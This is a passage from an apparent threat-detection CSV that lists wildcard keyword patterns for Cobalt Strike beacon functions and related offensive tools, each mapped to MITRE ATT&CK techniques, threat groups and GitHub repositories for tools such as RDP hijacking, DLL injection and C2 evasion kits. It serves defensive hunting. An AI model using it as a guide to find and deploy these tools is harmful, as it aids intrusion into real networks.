T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*beacon_generate.py*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_generate.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*Beacon_GETPOST*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*beacon_host_script*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*beacon_host_script*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*beacon_inline_execute*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_inline_execute*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" +"*beacon_log_clean*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*beacon_output_ps.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*beacon_print*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*BEACON_RDLL_*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exec_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_remote_exec_method_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exec_method_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exec_methods*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exploit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_remote_exploit_arch*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exploit_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exploit_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 